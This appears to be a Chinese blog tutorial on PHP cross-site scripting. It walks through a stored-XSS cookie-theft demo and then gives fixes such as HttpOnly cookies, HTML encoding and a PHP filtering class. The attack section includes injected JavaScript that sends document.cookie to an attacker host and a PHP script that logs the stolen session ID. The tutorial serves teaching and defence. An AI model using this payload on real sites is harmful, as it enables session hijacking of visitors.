php xss 实例,XSS攻防实例

最新推荐文章于 2024-07-01 14:52:34 发布
最新推荐文章于 2024-07-01 14:52:34 发布
阅读量355 收藏
点赞数
文章标签: php xss 实例

这篇是继上篇XSS跨站脚本攻击的后篇

1、XSS攻击实例分析

例1、简单XSS攻击

留言类,简单注入javascript

有个表单域:

1、假若用户填写数据为:(或者)

2、提交后将会弹出一个foolish警告窗口,接着将数据存入数据库

3、等到别的客户端请求这个留言的时候,将数据取出显示留言时将执行攻击代码,将会显示一个foolish警告窗口。

例2、盗取cookie

2、test88.com中的表单,xss.html

xss攻击

留言:

留言记录:

3、恶意攻击者插入相应代码

xss攻击

留言:


留言记录:

3、恶意攻击者插入相应代码

var Str=document.cookie; //获取cookie

var a =document.createElement('a'); //创建a标签

a.href='http://www.linuxtest.com/test2.php?'+Str; //攻击者主机

a.innerHTML="aa.jpg"; //掩护图片

document.body.appendChild(a); //将标签添加到页面中

4、数据(攻击代码)插入数据库

5、攻击者控制的主机中设置接收盗取的cookie

header("content-type:text/html;charset=utf8");

echo "你的PHPSESSID被盗啦";

echo "

";

print_r($_GET);

echo "

";

$cookie=$_GET['PHPSESSID'];

file_put_contents('./xss.txt', $cookie);

?>

开始模拟测试

1、test88.com中设置生成sessionID代码

session_start();

$_SESSION['xss']='xssssss';

echo "

";

print_r($_SESSION);

echo "

";die;

?>

2、客户端访问上面代码并生成自己的sessionID

6e58db0ac308

image

3、客户端访问xss.html

下面为模拟被攻击后取出数据的xss.html代码(显示数据)

xss攻击

留言:


留言记录:

var Str=document.cookie; //获取cookie

var a =document.createElement('a'); //创建a标签

a.href='http://www.linuxtest.com/test2.php?'+Str; //攻击者主机

a.innerHTML="aa.jpg"; //掩护图片

document.body.appendChild(a); //将标签添加到页面中

6e58db0ac308

image

4、客户端不小心点击到图片,sessionID将被盗

6e58db0ac308

image

vi xss.txt

6e58db0ac308

image

【当然这仅仅只是一个很简单的攻击,只要将数据过滤就可以避免这个攻击了,这里只是让大家了解XSS是如何进行攻击的。】

2、XSS漏洞修复

从上面XSS实例以及之前文章的介绍我们知道XSS漏洞的起因就是没有对用户提交的数据进行严格的过滤处理。因此在思考解决XSS漏洞的时候,我们应该重点把握如何才能更好的将用户提交的数据进行安全过滤。

1、html实体

什么是html实体?

在html中有些字符,像(

html实体的存在是导致XSS漏洞的主要原因之一。

因此我们需要将这些实体全部转换为相应的实体编号。

6e58db0ac308

20190210181822389.jpg

2、HTML Encode

用户将数据提交上来的时候进行HTML编码,将相应的符号转换为实体名称再进行下一步的处理。

在PHP中已经存在这样子功能的函数,即是htmlentities($str)函数。

与之相反的就是html_entity_decode($str)函数,它将实体名称转换为相应的符号。

3、修复漏洞方针

【不相应用户提交的数据,过滤过滤过滤!】

1、将重要的cookie标记为http only, 这样的话Javascript 中的document.cookie语句就不能获取到cookie了.

2、表单数据规定值的类型,例如:年龄应为只能为int、name只能为字母数字组合。。。。

4、对数据进行Html Encode 处理

5、过滤或移除特殊的Html标签, 例如:

6、过滤JavaScript 事件的标签。例如 "οnclick=", "onfocus" 等等。

【特别注意:】

在有些应用中是允许html标签出现的,甚至是javascript代码出现。因此我们在过滤数据的时候需要仔细分析哪些数据是有特殊要求(例如输出需要html代码、javascript代码拼接、或者此表单直接允许使用等等),然后区别处理!

4、PHP中的相应函数

【详细看PHP手册】

这里可能不全,想了解更多的看手册。

strip_tags($str, [允许标签]) #从字符串中去除 HTML 和 PHP 标记

htmlentities($str)函数 #转义html实体

html_entity_decode($str)函数 #反转义html实体

addcslashes($str, ‘字符’)函数 #给某些字符加上反斜杠

stripcslashes($str)函数 #去掉反斜杠

addslashes ($str )函数 #单引号、双引号、反斜线与 NULL加反斜杠

stripslashes($str)函数 #去掉反斜杠

htmlspecialchars() #特殊字符转换为HTML实体

htmlspecialchars_decode() #将特殊的 HTML 实体转换回普通字符

5、数据过滤类

<?php

class XSS

{

/**

* @desc 过滤数据

*

* @param $data string|array 输入数据

* @param $low bool 是否采用更为严格的过滤

*

* @return 返回过滤的数据

*/

public function clean_xss($data, $low = False)

{

#字符串过滤

if (! is_array ( $data ))

{

$data = trim ( $data ); #字符两边的处理

$data = strip_tags ( $data ); #从字符串中去除 HTML 和 PHP 标记

$data = htmlspecialchars ( $data ); #特殊字符转换为HTML实体

if ($low)

{

return $data;

}

#匹配换空格

$data = str_replace ( array ('"', "\\", "'", "/", "..", "../", "./", "//" ), '', $data );

$no = '/%0[0-8bcef]/';

$data = preg_replace ( $no, '', $data );

$no = '/%1[0-9a-f]/';

$data = preg_replace ( $no, '', $data );

$no = '/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S';

$data = preg_replace ( $no, '', $data );

return $data;

}

#数组过滤

$arr=array();

foreach ($data as $k => $v)

{

$temp=$this->clean_xss($v);

$arr[$k]=$temp;

}

return $arr;

}

}

#测试测试

session_start();

$_SESSION['xss']='xssss';

$xss=new XSS();

#测试字符串

$str = "";

echo $str;

$str2=$xss->clean_xss($str);

echo $str2;

echo "

";

#测试数组

$arr=array("","","");

echo "

";

print_r($arr);

echo "

";

$arr2=$xss->clean_xss($arr);

echo "

";

print_r($arr2);

echo "

";die;

?>

賴明宗
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于XSS系统攻防系统的研究
AI大模型应用之禅
06-11 627
基于XSS系统攻防系统的研究 1.背景介绍 1.1 XSS攻击的定义与危害 跨站脚本攻击(Cross Site Scripting),简称XSS,是一种常见的Web安全漏洞。攻击者利用网站未对用户提交数据进行有效过滤,在网页注入恶意脚本
XSS攻击实例1
01-11
简单让你了解xss攻击。 项目基于Asp.net 框架,VS2010下创建,C#语言
xss攻击实例php页面,xss攻击简单实例 - 凡尘里的一根葱的个人页面 - OSCHINA - 文开源技术交流社区...
weixin_35882650的博客
04-04 298
一个简单的留言板攻击实例我们有个页面用于允许用户发表留言,然后在页面底部显示留言列表html>.comment-title{font-size:14px;margin:6px0px2px4px;}.comment-body{font-size:14px;color:#ccc;font-style:italic;border-bottom:dashed1px#ccc;marg...
Web安全测试之XSS实例讲解
最新发布
软件测试技术交流分享
07-01 969
XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序最常见的漏洞。指攻击者在网页嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的. 比如获取用户的Cookie,导航到恶意网站,携带木马等。
xss攻击实例 php,记一次原生JS实现XSS攻击案例
weixin_32052253的博客
04-03 498
XSS:跨站脚本(Cross-site scripting)攻击手段和目的:攻击者使被攻击者在浏览器执行脚本后,如果需要收集来自被攻击者的数据(如cookie或其他敏感信息),可以自行架设一个网站,让被攻击者通过JavaScript等方式把收集好的数据作为参数提交,随后以数据库等形式记录在攻击者自己的服务器上。为了加深自己对XSS攻击的理解,特意尝试了一下,并把整个过程记录下来。攻击过程:①、客...
php xss 实例,【技术分享】每个人都该知道的7种主要的XSS案例
weixin_32401411的博客
03-29 261
预估稿费:160RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿0x00 引子“Master the 7 Main XSS Cases and be able to spot more than 90% of XSS vulnerabilities out there.”这句话说的这么diao,吓得我赶紧早早起来好好学学姿势。当我们读一些XSS相关资料时,经常能看到像al...
PHP "完美"的防XSS 防SQL注入的代码 喷
libo_sina的专栏
06-21 976
function gjj($str) {     $farr = array(         "/\\s+/",         "/]*?)>/isU",         "/(]*)on[a-zA-Z]+\s*=([^>]*>)/isU",     );     $str = preg_replace($farr,"",$str);     return addslashes
XSS攻防手册
12-30
**XSS(跨站脚本攻击)攻防手册** ...XSS攻防手册可能会详细涵盖这些概念,并通过实例、代码示例和最佳实践来帮助读者理解和应对XSS攻击。对于开发者来说,掌握这些知识是保障应用程序安全的关键。
18.XSS跨站脚本攻击原理及代码攻防演示(一)1
08-03
</script>`,如果这个输入被原样显示在结果页上,那么所有访问这个页面的用户都会看到一个弹出的警告框,这就是一个简单的XSS攻击实例。 3. XSS危害: XSS攻击可能导致以下后果: - 数据泄露:攻击者可以窃取用户...
【Web攻防XSS Cookie劫持实例
weixin_45983744的博客
02-05 1233
QQ交流群:811401950 一. XSS cookie劫持原理 Cookie一般加密保存了当前用户的登陆凭证。Cookie如果丢失,往往意味着用户的登陆凭证丢失。换句话说,攻击者可以不通过密码,而直接登陆进用户账户。 二.工具及环境 ① DVWA靶场环境 ② Hackbar火狐组件 ③ Windows7 虚拟机(存放收集cookie信息的php脚本文件) 三.具体步骤 登陆DVWA靶场,...
xss_test.7z
03-12
"xss_test.7z"这个压缩包文件,显然包含了用于XSS攻防练习的相关材料,这对于我们深入理解和防范XSS攻击至关重要。 首先,理解XSS的基本类型: 1. **存储型XSS**:这种类型的XSS攻击发生在用户提交的数据被存储到...
PHP网页xss攻击测试用例,Web安全测试 | xss攻击
weixin_29357243的博客
03-22 523
xss攻击的全称是Cross-Site Scripting (XSS)攻击,是一种注入式攻击。基本的做法是把恶意代码注入到目标网站。由于浏览器在打开目标网站的时候并不知道哪些脚本是恶意的,所以浏览器会无差别执行恶意脚本,从而导致用户信息和一些敏感信息被盗取和泄漏。xss一般分为两种类型,持久化的xss和非持久化的xss。持久化xss下面这个例子演示了攻击者如何通过注入恶意代码去盗取用户的cooki...
PHP如何防止XSS攻击
weixin_30411819的博客
05-17 605
PHP防止XSS跨站脚本攻击的方法:是针对非法的HTML代码包括单双引号等,使用htmlspecialchars()函数 。 在使用htmlspecialchars()函数的时候注意第二个参数, 直接用htmlspecialchars($string) 的话,第二个参数默认是ENT_COMPAT,函数默认只是转化双引号(“), 不对单引号(‘)做转义. 所以,htmlspecialchars函...
php简单模拟基于存储的XSS攻击
洞妖呼叫洞妖的博客
04-26 295
原理:将xss攻击代码保存到数据库内,动态显示在web页面上 我们以本地服务器作为被攻击者目标,攻击者服务器为http://phalcon.xyz:8080 1.新建一个文件,命名为message.php <?php session_start(); //连接数据库 try { $con = new PDO('mysql:host=127.0.0.1;dbname=xss_mess...
PHP防止Xss攻击
weixin_30650859的博客
07-31 67
mysql_real_escape_string() 所以得SQL语句如果有类似这样的写法:"select * from cdr where src =".$userId; 都要改成 $userId=mysql_real_escape_string($userId) 所有有打印的语句如echo,print等 在打印前都要使用htmlentities() 进行过滤,这样可以防止Xss,注意文要写出...
白帽子讲Web安全 第三章 跨站脚本攻击(XSS
weixin_30419799的博客
10-25 264
XSS----Cross Site Script; XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。 1、XSS根据效果划分三类: 1)反射型XSS(非持久型XSS):简单的把用户输入的数据“反射”给浏览器。黑客往往需要诱导用户点击一个恶意链接,才能攻击成功。 2)存储型XSS(持久型XSS):存储型会把用户输入...
php xss攻击
技术的搬运工
01-29 1016
xss攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括php、VBScript、ActiveX、 Flash 或者甚至是普通的HTML。
PHP数据入库优化-仿XSS攻击之一二
从2017开始记录起的博客
09-09 374
1.XSS概念    全称跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(CSS,Cascading Style Sheets)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。  2.在数据入库的时候为了防止XSS攻击,我
php安全(二):xss攻击
llllllloooooo的博客
05-29 369
   XSS 全称为 Cross Site Scripting,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其Web里面的html代码会被执行,进而达到某些人的攻击目的。分类1、XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。2、XSS存储型攻击,恶意代码被保存到目标网站的服务器,这种攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值